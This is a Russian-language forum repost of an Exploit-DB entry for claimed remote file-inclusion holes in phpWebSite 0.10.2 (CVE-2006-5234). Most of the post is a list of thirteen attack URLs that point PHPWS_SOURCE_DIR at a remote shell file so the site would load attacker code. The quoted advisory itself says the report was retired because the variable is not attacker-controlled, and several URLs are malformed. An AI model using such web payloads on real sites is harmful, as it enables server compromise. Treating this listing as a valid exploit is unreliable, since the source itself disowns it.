Exploit phpWebSite 0.10.2 - 'PHPWS_SOURCE_DIR' Multiple Remote File Inclusions

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
28774
Проверка EDB
  1. Пройдено
Автор
CRACKERS_CHILD
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-5234
Дата публикации
2006-10-09
Код:
source: https://www.securityfocus.com/bid/20412/info

phpWebSite is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.

phpWebSite version 0.10.2 is vulnerable to this issue; other versions may also be affected.

This BID is being retired. The 'PHPWS_SOURCE_DIR' is a constant and not an attacker-controlled variable.

http://www.example.com/mod/users/init.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/users.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/Cookie.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/forms.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/Groups.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/http://www.example.com/modSetting.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/Calendar.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/DateTime.php?PHPWS_HOME_DIR=http://Shel3ll.txt?
http://www.example.com/core/http://www.example.com/core.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/ImgLibrary.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/Manager.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/Template.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/EZform.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
 
Источник
www.exploit-db.com

Похожие темы